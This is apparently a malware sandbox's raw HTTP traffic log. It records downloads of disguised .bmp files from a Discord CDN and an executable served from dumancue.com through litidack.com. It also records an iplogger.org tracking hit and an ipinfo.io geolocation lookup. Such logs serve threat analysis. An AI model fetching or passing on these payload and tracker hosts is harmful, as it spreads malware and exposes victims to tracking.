GET /attachments/891006172130345095/905919347988508692/Passat0402.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:25 GMT
Content-Type: image/x-ms-bmp
Content-Length: 3527900
Connection: keep-alive
CF-Ray: 6a91d780fd6e61a1-ICN
Accept-Ranges: bytes
Age: 11028
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Passat0402.bmp
ETag: "10f92d4f497c8d410cf0dcaf9cd3e8c4"
Expires: Sat, 05 Nov 2022 00:07:25 GMT
Last-Modified: Thu, 04 Nov 2021 20:40:03 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636058403833602
x-goog-hash: crc32c=1NNsSA==
x-goog-hash: md5=EPktT0l8jUEM8NyvnNPoxA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 3527900
X-GUploader-UploadID: ADPycdv7or-1rDfZRPLy-GbcyFfuTuGyEvNOXdVFNG7nO_-V5lYKsgUzdjd8q0kPxkMyNUZXoeNW7jGzP8kd0rQ_YYa4wK2gJQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mlEEN%2BDgVNJi4kvWTruKbKVIirWcLEIQ%2F%2FLp%2BvyO%2FLuZJyg9mvVhnkAkAtPkUZaL7GL2z2a9iogH6Tm8SVo3NBl%2B3MNnfSVSJ5ZHmmZu%2B4QuDle5F01W6xoGsRfyF9NRuquELw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905917017234735184/Topov0402.bmp
GET /attachments/891006172130345095/905917017234735184/Topov0402.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:25 GMT
Content-Type: image/x-ms-bmp
Content-Length: 3452636
Connection: keep-alive
CF-Ray: 6a91d780fbfb0f98-ICN
Accept-Ranges: bytes
Age: 12948
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Topov0402.bmp
ETag: "8aa88d50b7897e3e2f0f3a31fdfdf4d8"
Expires: Sat, 05 Nov 2022 00:07:25 GMT
Last-Modified: Thu, 04 Nov 2021 20:30:48 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636057848162625
x-goog-hash: crc32c=CkfqkA==
x-goog-hash: md5=iqiNULeJfj4vDzox/f302A==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 3452636
X-GUploader-UploadID: ADPycdtaKwaeEaHRGwzihR_hQZ6KRo_n6I5OzG41jVPkn9bYjE2wDkquAb3mnOYmHSnS0pXpTpWeFUmQMtitI0N-OA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oBAJzGi8dTBoI%2F31Kf5mCfkyKk1l0gOHVblQn8DKtVb6QRvdEQCFZcfSKnDNkm7HiRfgrN3eK%2BeIMyDNgvFrLzxavJ5GansOZ42F5u9szWqU2bqNpRXpKdMcnZoyCv6Nce0Msg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905393686618193921/help0301.bmp
GET /attachments/891006172130345095/905393686618193921/help0301.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:27 GMT
Content-Type: image/x-ms-bmp
Content-Length: 390148
Connection: keep-alive
CF-Ray: 6a91d78deac20f68-ICN
Accept-Ranges: bytes
Age: 137331
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=help0301.bmp
ETag: "e24aaa8d072d4b39a37b7d0ac310be49"
Expires: Sat, 05 Nov 2022 00:07:27 GMT
Last-Modified: Wed, 03 Nov 2021 09:51:16 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1635933076334878
x-goog-hash: crc32c=wzJFvw==
x-goog-hash: md5=4kqqjQctSzmje30KwxC+SQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 390148
X-GUploader-UploadID: ADPycdsXmOTNxdVhbL6qN3BmWaEC4mfyS9Y3xlk9Tyd7-cE2GU58Df4V8x4994eZCq_exTDRDOJJ8cDR9C5YtaOOpB4g0OWJ4A
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nzN67bwrc12qsVrYqDcBqRCDPCmnkcvQ3Wo1%2BJenhFpcHX2Dlq%2Bp3gnbkJblq%2BnXTNnGkCsYLAhGj0RTsD9lrPymQb%2BHaBQX%2FRRf6Bn2OdU%2FLFUsatAFhz%2B%2BxkLNspji7kri2A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905726625025511474/sloader0401.bmp
GET /attachments/891006172130345095/905726625025511474/sloader0401.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:27 GMT
Content-Type: image/x-ms-bmp
Content-Length: 5453828
Connection: keep-alive
CF-Ray: 6a91d78ee9240f88-ICN
Accept-Ranges: bytes
Age: 57559
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=sloader0401.bmp
ETag: "00778de7b3c7ddb3b906a5d34dc98406"
Expires: Sat, 05 Nov 2022 00:07:27 GMT
Last-Modified: Thu, 04 Nov 2021 07:54:15 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636012455146460
x-goog-hash: crc32c=e4IP7Q==
x-goog-hash: md5=AHeN57PH3bO5BqXTTcmEBg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 5453828
X-GUploader-UploadID: ADPycdu1ForXf3mYDfyiT2pcFSCwUB1Ap4gRhv7tFv5JqOO4WIMUNIrGq3QPXzVIDKbAyPDIHy5M6c_bbvxsCvHguKnOt8XIbA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sI%2BlnDGYVKzAGVbITUdNlLilq2%2FVLwdYNe4kNIYt2e%2FFur%2BtKhFfZKVpPf5moLUz8r3AUkUpXZXqnRAaKmU6FZ5Rmx2MvBtoVuJbQwOHMzDerH0VA0ArbJeU1jrKNtVzLqgiew%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905750415910514738/5780_0401.bmp
GET /attachments/891006172130345095/905750415910514738/5780_0401.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:28 GMT
Content-Type: image/x-ms-bmp
Content-Length: 593412
Connection: keep-alive
CF-Ray: 6a91d7922b456183-ICN
Accept-Ranges: bytes
Age: 52429
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=5780_0401.bmp
ETag: "837a41d93e768faf1d590537621e8252"
Expires: Sat, 05 Nov 2022 00:07:28 GMT
Last-Modified: Thu, 04 Nov 2021 09:28:47 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636018127226662
x-goog-hash: crc32c=GGonVw==
x-goog-hash: md5=g3pB2T52j68dWQU3Yh6CUg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 593412
X-GUploader-UploadID: ADPycdse1gxmJRBpy2LGORhd2yljYgBKlsNI_i_fikySaRzcCHkRuzqNAgrK9r4g6fdigCYep8H2SfRK2xuplbz5Ng
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EGQOP%2BCoCTGoROWev1E9G7M4U2hhAXl9i5bo0p66MPXssqjsruZFLfqXmp%2FdMUl8VYoij9hCRxiRdC9eHDFTFErBrai6BvCpmJoHIlwpfF3WMIujGzwFqslENKBd7FDzx%2Fsdew%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
307
https://dumancue.com/dd7c8e90c804f83b712eb175eb0daaef.exe
GET /dd7c8e90c804f83b712eb175eb0daaef.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: dumancue.com
Cache-Control: no-cache
HTTP/1.1 307 Temporary Redirect
Date: Fri, 05 Nov 2021 00:07:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
location: https://litidack.com/af016c52b60489b5da52d037a2d6dd6b/dd7c8e90c804f83b712eb175eb0daaef.exe
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VvGsN76gTshtyWxMEpOUWJGcQF9fuGOysPxMIQyNBHLAS7A2N%2BT5TRSAVMMtqj2LOWpBup0JBOBshXr6Dnx5%2FlD%2FjdgDNl8W9iKwEe3KLScx6sxLy85PiyW54PL3v4A%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a91d79c7f710ab6-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
https://litidack.com/af016c52b60489b5da52d037a2d6dd6b/dd7c8e90c804f83b712eb175eb0daaef.exe
GET /af016c52b60489b5da52d037a2d6dd6b/dd7c8e90c804f83b712eb175eb0daaef.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache
Host: litidack.com
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:32 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4554792
Connection: keep-alive
last-modified: Thu, 04 Nov 2021 23:42:51 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7vmbQOC8St0yoZpfoemXA2q5fpSmeMrLvXniqIPv4CrFSxi9REY%2FwjGPKIbFzdns9V7fVLKdtcy9f8TOzc0fEc%2FolLAWuEk3ld7F8L8v0kslZa9UHG9Ff9FPBRRYpLM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a91d7a48a08aed3-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
https://cdn.discordapp.com/attachments/893177342426509335/905791554113912932/uglinesses.jpg
GET /attachments/893177342426509335/905791554113912932/uglinesses.jpg HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:33 GMT
Content-Type: image/jpeg
Content-Length: 655159
Connection: keep-alive
CF-Ray: 6a91d7b40abb0f70-ICN
Accept-Ranges: bytes
Age: 41396
Cache-Control: public, max-age=31536000
ETag: "d935391d51aa6298ace628ca0d6d1dd4"
Expires: Sat, 05 Nov 2022 00:07:33 GMT
Last-Modified: Thu, 04 Nov 2021 12:12:15 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Cf-Bgj: h2pri
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636027935372164
x-goog-hash: crc32c=oNG1aQ==
x-goog-hash: md5=2TU5HVGqYpis5ijKDW0d1A==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 655159
X-GUploader-UploadID: ADPycdvkBa3IR-5_aZ0JJNfp_knvtmkDpbiTF4mjgZPhFD_avKH3jao0RZdf1j9s_HmCpzDg6r62b5L4tZRcEoxRpVA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LZGcfe2Cu%2BuwugSjKgt2RT211y02BjkOPtmG7BM9yvlW5TE9J9My1XbWu3qiIXV6PjsFsoERMvh3uGd%2Bl0Vg8GOQLUFin48S02T0kHP%2F0annAElNhn8EGIKIhMGvWCuKqbGvvw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://yandex.ru/
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: yandex.ru
HTTP/1.1 200 Ok
Accept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT
Accept-CH-Lifetime: 31536000
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Content-Security-Policy: report-uri https://csp.yandex.net/csp?project=morda&from=morda.big.ru&showid=1636070854.79569.85728.577338&h=stable-morda-sas-yp-163&yandexuid=4546107721636070854&&version=2021-11-02-1&adb=0;child-src passport.yandex.ru yandex.ru yastatic.net 'self' blob: zen.yandex.ru awaps.yandex.net yandexadexchange.net *.yandexadexchange.net storage.mds.yandex.net *.yandex.ru banners.adfox.ru yastat.net mc.yandex.ru mc.yandex.md passport.yandex.ru;script-src 'nonce-CLSfg+1iE6pm9t9GMtElwQ==' mc.yandex.com zen-yandex-ru.cdnclab.net yastatic.net yandex.ru 'self' an.yandex.ru z.moatads.com storage.mds.yandex.net zen.yandex.ru yandex.st mc.yandex.ru banners.adfox.ru ads.adfox.ru ads6.adfox.ru yastat.net *.mc.yandex.ru adstat.yandex.ru;connect-src *.cdn.ngenix.net *.strm.yandex.net auto.ru blob: favicon.yandex.net log.strm.yandex.ru mc.yandex.com thequestion.ru www.kinopoisk.ru zen-yandex-ru.cdnclab.net yandex.ru yastatic.net yastat.net 'self' portal-xiva.yandex.net wss://portal-xiva.yandex.net strm.yandex.ru mobile.yandex.net yabs.yandex.ru an.yandex.ru verify.yandex.ru *.verify.yandex.ru mc.yandex.ru yandex.st matchid.adfox.yandex.ru adfox.yandex.ru ads.adfox.ru ads6.adfox.ru jstracer.yandex.ru awaps.yandex.ru tps.doubleverify.com pixel.adsafeprotected.com wss://webasr.voicetech.yandex.net zen.yandex.ru *.mediascope.mc.yandex.ru *.strm.yandex.ru frontend.vh.yandex.ru wss://push.yandex.ru awaps.yandex.net *.mc.yandex.ru adstat.yandex.ru mc.admetrica.ru;img-src *.verify.yandex.ru auto.ru strm.yandex.net thequestion.ru www.kinopoisk.ru zen-yandex-ru.cdnclab.net 'self' yastatic.net data: yandex.ru resize.yandex.net *.strm.yandex.net strm.yandex.ru avatars-fast.yandex.net favicon.yandex.net banners.adfox.ru content.adfox.ru ads6.adfox.ru yastat.net avatars.mds.yandex.net mc.yandex.ru *.tns-counter.ru verify.yandex.ru ads.adfox.ru bs.serving-sys.com ad.adriver.ru wcm.solution.weborama.fr wcm-ru.frontend.weborama.fr mc.admetrica.ru ad.doubleclick.net rgi.io 
track.rutarget.ru ssl.hurra.com px.moatads.com amc.yandex.ru gdeby.hit.gemius.pl tps.doubleverify.com pixel.adsafeprotected.com impression.appsflyer.com yabs.yandex.ru zen.yandex.ru s3.mds.yandex.net zen.s3.yandex.net *.mediascope.mc.yandex.ru tns-counter.ru storage.mds.yandex.net an.yandex.ru awaps.yandex.net awaps.yandex.ru gdero.hit.gemius.pl pixel.adlooxtracking.com mc.yandex.com *.mc.yandex.ru adstat.yandex.ru;style-src 'unsafe-inline' yastatic.net zen.yandex.ru yandex.st banners.adfox.ru content.adfox.ru yastat.net;media-src *.cdn.ngenix.net blob: *.strm.yandex.net *.yandex.net strm.yandex.ru *.strm.yandex.ru yastat.net data: yandex.ru yandex.st yastatic.net banners.adfox.ru content.adfox.ru;default-src yastatic.net yastat.net zen.yandex.ru awaps.yandex.net awaps.yandex.ru;font-src yastatic.net zen.yandex.ru an.yandex.ru yastat.net data: 'self';object-src avatars.mds.yandex.net
Content-Type: text/html; charset=UTF-8
Date: Fri, 05 Nov 2021 00:07:34 GMT
Expires: Fri, 05 Nov 2021 00:07:35 GMT
Last-Modified: Fri, 05 Nov 2021 00:07:35 GMT
NEL: {"report_to": "network-errors", "max_age": 86400, "success_fraction": 0.001, "failure_fraction": 0.1}
P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"
Report-To: { "group": "network-errors", "max_age": 86400, "endpoints": [ { "url": "https://dr.yandex.net/nel"}]}
Set-Cookie: yp=1638662855.ygu.1; Expires=Mon, 03-Nov-2031 00:07:34 GMT; Domain=.yandex.ru; Path=/
Set-Cookie: mda=0; Expires=Sat, 05-Mar-2022 00:07:34 GMT; Domain=.yandex.ru; Path=/
Set-Cookie: yandex_gid=10635; Expires=Sun, 05-Dec-2021 00:07:34 GMT; Domain=.yandex.ru; Path=/
Set-Cookie: yandexuid=4546107721636070854; Path=/; Domain=.yandex.ru; Expires=Mon, 03-Nov-2031 00:07:34 GMT; Secure
Set-Cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Nov 2023 00:07:34 GMT
Set-Cookie: is_gdpr_b=COaIGBCTTygC; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Nov 2023 00:07:34 GMT
Set-Cookie: _yasc=agJF+YVKoJPu5272ivALIPGUkilFpwhrRvoYIZXqIpI/zGSK; domain=.yandex.ru; path=/; expires=Sun, 05-Dec-2021 00:07:34 GMT; secure
Set-Cookie: i=mC31qOSIsZFEeIiSpxxbUlrmQXhXzV7lqE5HPF7QgjQYdqIz5ZALvvWkOs3pONSocVLSAwO17VnNKmGm6O4HG/W3Y/c=; Expires=Sun, 05-Nov-2023 00:07:34 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
Strict-Transport-Security: max-age=31536000; includeSubDomains
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Requestid: 1636070854.79569.85728.577338
X-Yandex-Req-Id: 1636070854757621-15562047315954610772-man1-0358-331-man-l7-balancer-8080-BAL-8747
GET
200
https://yandex.ru/
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: yandex.ru
HTTP/1.1 200 Ok
Accept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT
Accept-CH-Lifetime: 31536000
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Content-Security-Policy: media-src *.cdn.ngenix.net blob: *.strm.yandex.net *.yandex.net strm.yandex.ru *.strm.yandex.ru yastat.net data: yandex.ru yandex.st yastatic.net banners.adfox.ru content.adfox.ru;script-src 'nonce-gaS0T6ZzO/FkHWN5zpN5tA==' mc.yandex.com zen-yandex-ru.cdnclab.net yastatic.net yandex.ru 'self' an.yandex.ru z.moatads.com storage.mds.yandex.net zen.yandex.ru yandex.st mc.yandex.ru banners.adfox.ru ads.adfox.ru ads6.adfox.ru yastat.net *.mc.yandex.ru adstat.yandex.ru;child-src passport.yandex.ru yandex.ru yastatic.net 'self' blob: zen.yandex.ru awaps.yandex.net yandexadexchange.net *.yandexadexchange.net storage.mds.yandex.net *.yandex.ru banners.adfox.ru yastat.net mc.yandex.ru mc.yandex.md passport.yandex.ru;img-src *.verify.yandex.ru auto.ru strm.yandex.net thequestion.ru www.kinopoisk.ru zen-yandex-ru.cdnclab.net 'self' yastatic.net data: yandex.ru resize.yandex.net *.strm.yandex.net strm.yandex.ru avatars-fast.yandex.net favicon.yandex.net banners.adfox.ru content.adfox.ru ads6.adfox.ru yastat.net avatars.mds.yandex.net mc.yandex.ru *.tns-counter.ru verify.yandex.ru ads.adfox.ru bs.serving-sys.com ad.adriver.ru wcm.solution.weborama.fr wcm-ru.frontend.weborama.fr mc.admetrica.ru ad.doubleclick.net rgi.io track.rutarget.ru ssl.hurra.com px.moatads.com amc.yandex.ru gdeby.hit.gemius.pl tps.doubleverify.com pixel.adsafeprotected.com impression.appsflyer.com yabs.yandex.ru zen.yandex.ru s3.mds.yandex.net zen.s3.yandex.net *.mediascope.mc.yandex.ru tns-counter.ru storage.mds.yandex.net an.yandex.ru awaps.yandex.net awaps.yandex.ru gdero.hit.gemius.pl pixel.adlooxtracking.com mc.yandex.com *.mc.yandex.ru adstat.yandex.ru;style-src 'unsafe-inline' yastatic.net zen.yandex.ru yandex.st banners.adfox.ru content.adfox.ru yastat.net;connect-src *.cdn.ngenix.net *.strm.yandex.net auto.ru blob: favicon.yandex.net log.strm.yandex.ru mc.yandex.com thequestion.ru www.kinopoisk.ru zen-yandex-ru.cdnclab.net yandex.ru yastatic.net yastat.net 'self' 
portal-xiva.yandex.net wss://portal-xiva.yandex.net strm.yandex.ru mobile.yandex.net yabs.yandex.ru an.yandex.ru verify.yandex.ru *.verify.yandex.ru mc.yandex.ru yandex.st matchid.adfox.yandex.ru adfox.yandex.ru ads.adfox.ru ads6.adfox.ru jstracer.yandex.ru awaps.yandex.ru tps.doubleverify.com pixel.adsafeprotected.com wss://webasr.voicetech.yandex.net zen.yandex.ru *.mediascope.mc.yandex.ru *.strm.yandex.ru frontend.vh.yandex.ru wss://push.yandex.ru awaps.yandex.net *.mc.yandex.ru adstat.yandex.ru mc.admetrica.ru;report-uri https://csp.yandex.net/csp?project=morda&from=morda.big.ru&showid=1636070855.03766.97786.592724&h=prestable-morda-vla-yp-212&yandexuid=4007445901636070855&&version=2021-11-02-1&adb=0;default-src yastatic.net yastat.net zen.yandex.ru awaps.yandex.net awaps.yandex.ru;font-src yastatic.net zen.yandex.ru an.yandex.ru yastat.net data: 'self';object-src avatars.mds.yandex.net
Content-Type: text/html; charset=UTF-8
Date: Fri, 05 Nov 2021 00:07:35 GMT
Expires: Fri, 05 Nov 2021 00:07:35 GMT
Last-Modified: Fri, 05 Nov 2021 00:07:35 GMT
NEL: {"report_to": "network-errors", "max_age": 86400, "success_fraction": 0.001, "failure_fraction": 0.1}
P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"
Report-To: { "group": "network-errors", "max_age": 86400, "endpoints": [ { "url": "https://dr.yandex.net/nel"}]}
Set-Cookie: yp=1638662855.ygu.1; Expires=Mon, 03-Nov-2031 00:07:35 GMT; Domain=.yandex.ru; Path=/
Set-Cookie: mda=0; Expires=Sat, 05-Mar-2022 00:07:35 GMT; Domain=.yandex.ru; Path=/
Set-Cookie: yandex_gid=10635; Expires=Sun, 05-Dec-2021 00:07:35 GMT; Domain=.yandex.ru; Path=/
Set-Cookie: yandexuid=4007445901636070855; Path=/; Domain=.yandex.ru; Expires=Mon, 03-Nov-2031 00:07:35 GMT; Secure
Set-Cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Nov 2023 00:07:35 GMT
Set-Cookie: is_gdpr_b=COaIGBCTTygC; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Nov 2023 00:07:35 GMT
Set-Cookie: _yasc=KRFvcaiqtf8Xl1WW6hUFruakoxjAxEg6XpnnSa+T1hl0KrxL; domain=.yandex.ru; path=/; expires=Sun, 05-Dec-2021 00:07:35 GMT; secure
Set-Cookie: i=w6xiFqkTm7TdAJFkJCGO4ZHqJMsyBCSy5Oz6IU9mzthbN/Z/2+m/vhACCtdnv8GuZ8UCBqShH73845dQCImzmXkGMSE=; Expires=Sun, 05-Nov-2023 00:07:35 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
Strict-Transport-Security: max-age=31536000; includeSubDomains
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Requestid: 1636070855.03766.97786.592724
X-Yandex-Req-Id: 1636070855002240-17596764995700744590-man1-3974-man-l7-balancer-8080-BAL-1108
GET
200
https://www.listincode.com/
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.listincode.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Access-Control-Allow-Origin: *
GET
200
https://iplogger.org/1GWfv7
GET /1GWfv7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: iplogger.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:38 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=u41802e04gs63crm8c3keqp791; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242977333; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2545b4ccbc3d20c553c5c74e8fab8603327ecdc0f45cc13358586ab2a94d337e
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://ipinfo.io/widget
GET /widget HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: ipinfo.io
HTTP/1.1 200 OK
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
content-type: application/json; charset=utf-8
content-length: 876
